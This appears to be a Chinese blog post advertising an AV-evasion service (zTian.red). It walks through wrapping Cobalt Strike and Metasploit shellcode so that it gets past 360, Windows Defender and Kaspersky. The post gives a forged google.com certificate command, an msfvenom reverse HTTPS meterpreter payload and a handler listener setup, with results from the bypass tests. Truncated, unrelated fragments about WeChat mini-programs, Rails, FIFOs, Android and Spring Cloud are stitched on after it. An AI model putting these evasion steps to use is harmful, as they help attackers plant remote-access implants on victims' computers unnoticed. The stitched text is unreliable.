# zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令...
测试目标:Windows Defender、卡巴斯基、360安全卫士极速版
系统环境:win10 64位
软件版本:cs4.7破解版、msf社区免费版
流量通信:http与https
测试平台:遮天对抗平台,地址:zTian.red
测试时间:2022-11-16
一、Cobalt Strike ShellCode免杀测试:
开始:
使用默认无修改teamserver配置,直接运行服务。
添加两个监听,然后生成payload文件。导出payload时文件类型可以选择C、Java、Python。
打开遮天对抗平台,选中要进行测试的payload文件。
选中payload,填入获取到的私钥,然后提交任务。
先各生成一个免杀文件:
DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)
测试绕过360安全防护:
另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。
下载使用http流量的程序,没想到却无任何反应。
云查杀无异常且可以动态执行命令。
测试绕过Windows Defender:
在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。
运行https,未被拦截,且可以执行命令。
测试绕过卡巴斯基:
不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。
重新提交任务,勾选智能反沙箱。
再次扫描成功绕过。
只是反沙箱模块需要诸多条件,如:禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。
经过十几秒的等待,成功上线。执行命令,完美响应
总结
360安全卫士静态识别出了https类型程序,没有检测到http类型程序。
Windows Defender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。
卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。
二、MSF免杀测试:
由于我对MSF用法不是那么熟悉,以下仅测试一种方案:
使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,
使用ssl加密流量测试绕过。先生成证书,执行命令:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \-keyout www.google.com.key \-out www.google.com.crt && \cat www.google.com.key www.google.com.crt>www.google.com.pem && \rm -f www.google.com.key www.google.com.crt
之后在绝对路径可以看到证书文件
再执行命令生成payload:
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=172.21.194.45 LPORT=8789 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f c
生成完毕之后进入msf控制台执行监听命令:
use exploit/multi/handlerset payload windows/meterpreter/reverse_winhttpsset lhost 0.0.0.0set lport 4444set HandlerSSLCert /home/kali/google.pemset StagerVerifySSLCert trueset IgnoreUnknowPayloads trueset exitonsession falseexploit
复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。
生成后直接执行,获取到session
使用进入meterpreter之后完美执行命令且无拦截。
扩展:识别Anti Virus进程方式:
执行命令“TASKLIST /SVC” 然后将得到的结果粘贴至下方识别栏里进行识别。
识别出卡巴斯基。
项目地址:github.com/yqcs/zhetian
@作者:SYFStrive @博客首页:HomePage📜:微信小程序📌:个人社区(欢迎大佬们加入)👉:社区链接🔗📌:觉得文章不错可以点点关注👉:专栏连接🔗💃:感谢支持,学累了可以先看小段由小胖给大家带来的街舞👉微信小程序(🔥)目录自定义组件-behaviors 1、什么是behaviors 2、behaviors的工作方式 3、创建behavior 4、导入并使用behavior 5、behavior中所有可用的节点 6、同名字段的覆盖和组合规则总结最后自定义组件-behaviors 1、什么是behaviorsbehaviors是小程序中,用于实现
我正在按照MicahelHartl的Rails教程构建示例应用程序。我试着探索了一下并添加了一些不同的东西——所以在用户表中我添加了一个account_balance列。问题是User模型内置了一堆验证:validates:name,presence:true,length:{maximum:50}validates:username,presence:true,length:{maximum:50}VALID_EMAIL_REGEX=/\A[\w+\-.]+@[a-z\d\-]+(?:\.[a-z\d\-]+)*\.[a-z]+\z/ivalidates:email,presence
最近在工作中,看到一些新手测试同学,对接口测试存在很多疑问,甚至包括一些从事软件测试3,5年的同学,在聊到接口时,也是一知半解;今天借着这个机会,对接口测试做个实战教学,顺便总结一下经验,分享给大家。计划拆分成4个模块跟大家做一个分享,(接口测试、接口基础知识、接口自动化、接口进阶)感兴趣的小伙伴记得关注,希望对你的日常工作和求职面试,带来一些帮助。注:文章较长有5000多字,希望小伙伴们认真看完,当然有些内容对小白同学不是太友好,如果你需要详细了解其中的一些概念或者名词,请在文章之后留言,后续我将针对大家的疑问,整理输出一些大家感兴趣的文章。随着开发模式的迭代更新,前后端分离已不是新的概念,
目录FIFO一.自定义同步FIFO1.1代码设计1.2Testbech1.3行为仿真***学习位宽计算函数$clog2()***$clog2()系统函数使用,可以不关注***分布式资源或者BLOCKBRAM二.异步FIFO2.1在FIFO判满的时候有两种方式:2.2异步FIFO为什么要使用格雷码2.2.1介绍格雷码2.2.2格雷码在异步FIFO中的应用2.2.2格雷码判满2.4二进制与格雷码之间的转换2.4.1二进制码转换为格雷码的方法2.4.2格雷码转换为二进制码的方法2.3实现框图2.5实现及仿真代码2.6仿真图验证2.7结论FIFO 这篇更多的是记录FIFO学习,参考了众多优秀的文章,
因此,我们的页面中有以下代码:OnOff这是2个单选按钮。'开和关'。“关闭”是默认值。使用Watir-webdriver和Ruby,我们想要选择“打开”单选按钮。我们这样做:browser.radio(:id=>"HasRegistration_true").set但在这样做时,我们得到以下错误:`WebElement.clickElement':Elementcannotbescrolledintoview:[objectHTMLInputElement](Selenium::WebDriver::Error::MoveTargetOutOfBoundsError)我们知道Sele
在rails中,我有迁移来改变生产数据以适应新的验证规则,有几处错误所以我有2个不同的迁移(它们可能是一个但仍然是分开运行的两个方面)一个失败,因为另一个验证不是遇到了,反之亦然验证在模型中是新的,例如validates_uniqueness_of:job_id,:scope=>[:day,:time,:user_id,:overtime,:comments],:message=>"DuplicateEntry,Pleasecheckyourdata"validates_uniqueness_of:job_id,:scope=>[:day,:user_id,:comments],:me
今天下午我在玩一个主意,偶然发现了一些我不太明白的东西。基本上我在这个实验中试图实现的是在每次创建字符串时以某种方式知道(供以后使用,例如在某种DSL中)。以下内容适用于通过String.new创建的任何字符串:class::Stringclass例如irb>String.new("foo")initializing'foo'newing'foo'=>"foo"我想不通的是当您使用文字时如何创建String对象。例如,为什么这不经过相同的初始化和设置:irb>"literalstring"=>"literalstring"我意识到当字符串是文字时,编译器会做一些不同的事情,但它不需要初
运行有问题或需要源码请点赞关注收藏后评论区留言一、利用ContentResolver读写联系人在实际开发中,普通App很少会开放数据接口给其他应用访问。内容组件能够派上用场的情况往往是App想要访问系统应用的通讯数据,比如查看联系人,短信,通话记录等等,以及对这些通讯数据及逆行增删改查。首先要给AndroidMaifest.xml中添加响应的权限配置 下面是往手机通讯录添加联系人信息的例子效果如下分成三个步骤先查出联系人的基本信息,然后查询联系人号码,再查询联系人邮箱代码 ContactAddActivity类packagecom.example.chapter07;importandroid
📝学技术、更要掌握学习的方法,一起学习,让进步发生👩🏻作者:一只IT攻城狮。💐学习建议:1、养成习惯,学习java的任何一个技术,都可以先去官网先看看,更准确、更专业。💐学习建议:2、然后记住每个技术最关键的特性(通常一句话或者几个字),从主线入手,由浅入深学习。❤️《SpringCloud入门实战系列》解锁SpringCloud主流组件入门应用及关键特性。带你了解SpringCloud主流组件,是如何一战解决微服务诸多难题的。项目demo:源码地址👉🏻SpringCloud入门实战系列不迷路👈🏻:SpringCloud入门实战(一)什么是SpringCloud?SpringCloud入门实战
在我的Rails项目的Gemfile中,我开始有辅助gem,例如“ruby-debug19”、“perftools.rb”或“irbtools”。所有这些实际上与项目无关,而是我本地开发设置的一部分。但是因为我使用的是bundler,所以我无法加载这些gems(即使它们是在系统范围内安装的),除非我将它们添加到Gemfile中。在我看来,这有点代码味道。例如,我希望能够在railsconsole中require'irbtools'而无需将“irbtools”添加到我的Gemfile。有没有办法将辅助gem排除在Gemfile之外,并且仍然能够在我需要它们时加载它们以进行调试、分析等?